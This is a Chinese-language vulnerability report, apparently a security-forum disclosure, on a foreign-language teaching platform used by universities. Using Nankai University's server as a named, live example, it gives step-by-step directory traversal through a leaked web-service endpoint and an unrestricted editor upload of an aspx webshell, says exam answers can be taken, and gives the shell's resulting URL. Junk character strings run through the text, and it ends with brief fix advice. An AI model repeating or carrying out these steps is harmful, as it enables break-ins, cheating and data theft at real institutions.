新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中
$ ~0 C% p7 {. _9 q& [- h
0 I3 N. O, [4 H, W7 _0 X' e% ]2 E: K5 @' W详细说明：
' X1 y1 V: P: \: w6 _  Z$ Q
# L8 a2 b& A0 }6 \; _以南开大学的为例:
1 V" d: n3 y: o/ t2 I' E8 }$ b# phttp://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
- I- i7 D) Y2 S- F" T- k<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
- r8 J$ y! l% w+ `</add>
直接访问
7 f  C" Q2 Q) u% ~( ?3 {' yhttp://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
2 |: n- L1 I$ r1 khttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
# y% ~. }& K3 y$ Q+ M% p& _http://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
5 a) p  \* t3 g# ]0 G上传后继续列目录找到木马地址直接访问即可
8 ^) _( e7 H6 e" g, \( V: `
  O0 N5 h: [$ T5 m0 POOXX
. a! b3 X' K" n# a
# z/ z  ^1 m( j/ O) j3 D0 u9 TGoogle "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
" b1 ?% e0 f+ D( ?9 `: H  m& y( I漏洞证明：

' ?9 }2 L* Q: A9 C" }; @! J) {6 Q列目录：
http://222.30.60.3/NPELS/CommonS ... List?version=../../
6 `. Q& G; U3 w( N文件上传：
http://222.30.60.3/npelsv/editor/editor.htm

上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
8 P  o5 W1 V2 o/ B% x
修复方案：
+ }1 y2 G( Q7 v  Y好像考试系统必须使用 CommonService.asmx
4 e  K6 c  q' n; |5 ]5 C  z3 P) F# \( e最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
) m$ G: \2 u8 Y! d* d